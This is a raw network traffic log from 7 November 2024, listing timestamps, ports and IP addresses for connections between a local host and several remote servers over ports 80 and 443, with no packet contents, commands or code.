Nov 7, 2024 17:55:12.497612000 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497621059 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497637033 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497654915 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497672081 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497689009 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497706890 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497723103 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497723103 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497734070 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497752905 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497771025 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497790098 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497807026 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497823954 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497840881 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497859001 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497876883 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497894049 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497911930 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497922897 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497922897 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497922897 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497922897 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497922897 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497922897 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.497951031 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497971058 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.497987986 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498006105 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498017073 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498017073 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498017073 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498017073 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498017073 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498017073 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498045921 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498064995 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498084068 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498100996 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498119116 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498136044 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498140097 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498140097 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498163939 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.498187065 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498188019 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498295069 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498295069 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498343945 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498343945 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498343945 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498343945 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.498343945 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.690036058 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690063953 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690083027 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690287113 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.690287113 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.690340996 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690363884 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690381050 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690398932 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690418005 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690449953 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690473080 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690491915 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690510035 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690529108 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.690649033 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.690676928 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.877311945 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.877398968 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.877466917 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.877513885 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.877557993 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.877573967 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.877638102 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.877681017 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.877712965 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:12.877733946 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:12.877825022 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:13.832420111 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:13.999983072 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.000013113 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.000314951 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.004776955 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.004791975 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.244931936 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.245209932 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.247103930 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.247175932 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.249253988 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.284254074 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.284254074 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.284559965 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.746762037 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.746897936 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.747123003 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.750149965 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.750149965 CET	49711	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.750180006 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.750189066 CET	443	49711	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.843425035 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.843504906 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:14.843664885 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.843877077 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:14.843897104 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.080929995 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.081146002 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.082109928 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.082159996 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.083144903 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.084301949 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.084301949 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.084553957 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.923602104 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.923661947 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.923702955 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.923738003 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.923770905 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.923827887 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.923846006 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.923875093 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.924034119 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.924628973 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.924921036 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.925790071 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.927083015 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.927130938 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.927350998 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.927367926 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.927578926 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.928380013 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.928482056 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.928706884 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.928808928 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.928808928 CET	49712	443	192.168.11.20	104.21.19.177
Nov 7, 2024 17:55:15.928823948 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:15.928829908 CET	443	49712	104.21.19.177	192.168.11.20
Nov 7, 2024 17:55:19.628113031 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:19.628142118 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:19.628319025 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:19.628792048 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:19.628815889 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:19.990608931 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:19.990641117 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:19.990829945 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:19.991173029 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:19.991192102 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.051006079 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.051338911 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.051357985 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.052798986 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.052997112 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.062683105 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.062788010 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.062901974 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.062926054 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.062980890 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.062989950 CET	443	49719	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.063028097 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.063054085 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.063081026 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.063194036 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.063363075 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.063373089 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.063556910 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.063561916 CET	443	49719	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.107985973 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.278776884 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.281523943 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.281747103 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.282493114 CET	49716	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.282519102 CET	443	49716	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.408536911 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.408907890 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.408932924 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.410767078 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.410947084 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.411247969 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.411329985 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.411410093 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.458611965 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.458631992 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.477464914 CET	443	49719	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.477801085 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.477826118 CET	443	49719	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.479126930 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.479453087 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.479479074 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.480469942 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.480621099 CET	443	49719	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.480797052 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.480942965 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.481132984 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.481175900 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.481210947 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.481357098 CET	443	49719	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.505516052 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.521034002 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.521034002 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.521059990 CET	443	49719	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.521073103 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.567862988 CET	49719	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.661433935 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.661485910 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.661540985 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.661581993 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.661638021 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.661655903 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.661659956 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.661710024 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.661778927 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.661863089 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.668885946 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.721522093 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.721539974 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.726785898 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.726964951 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.727072001 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.727540016 CET	49718	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.727560997 CET	443	49718	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.764446974 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.764692068 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.764718056 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.767932892 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.768121958 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.768147945 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.775516033 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.775770903 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.775795937 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.782879114 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.783191919 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.783211946 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.790354967 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.790571928 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.790585041 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.797662973 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.797950029 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.797962904 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.804975033 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.805279970 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.805291891 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.812136889 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.812329054 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.812340975 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.819484949 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.819808960 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.819820881 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.826909065 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.827110052 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.827122927 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.834319115 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.834558010 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.834568024 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.841439009 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.841681957 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.841691017 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.867099047 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.867279053 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.867289066 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.876728058 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.876749039 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.876939058 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.876948118 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.877104998 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.882567883 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.888144970 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.888242006 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.888495922 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.888505936 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.888664961 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.893879890 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.899359941 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.899378061 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.899574995 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.899584055 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.899835110 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.904932022 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.910562038 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.910582066 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.910798073 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.910808086 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.911058903 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.916121006 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.921766043 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.921818972 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.922194004 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.922203064 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.922358990 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.927417994 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.932914972 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.932940006 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.933139086 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.933147907 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.933464050 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.938466072 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.944264889 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.944289923 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.944674969 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.944700003 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.944926977 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.950453043 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.955172062 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.955192089 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.955449104 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.955461025 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.955634117 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.959989071 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.965006113 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.965111017 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.965451002 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.965464115 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.965863943 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.970125914 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.975533962 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.975565910 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.975817919 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.975831032 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.976145983 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.980324984 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.983758926 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.983779907 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.984024048 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.984036922 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.984322071 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.986275911 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.989345074 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.989376068 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.989492893 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.989506960 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.989754915 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.992126942 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.995596886 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.995628119 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.995881081 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.995893955 CET	443	49717	142.251.35.164	192.168.11.20
Nov 7, 2024 17:55:20.996073961 CET	49717	443	192.168.11.20	142.251.35.164
Nov 7, 2024 17:55:20.998183966 CET	443	49717	142.251.35.164	192.168.11.20
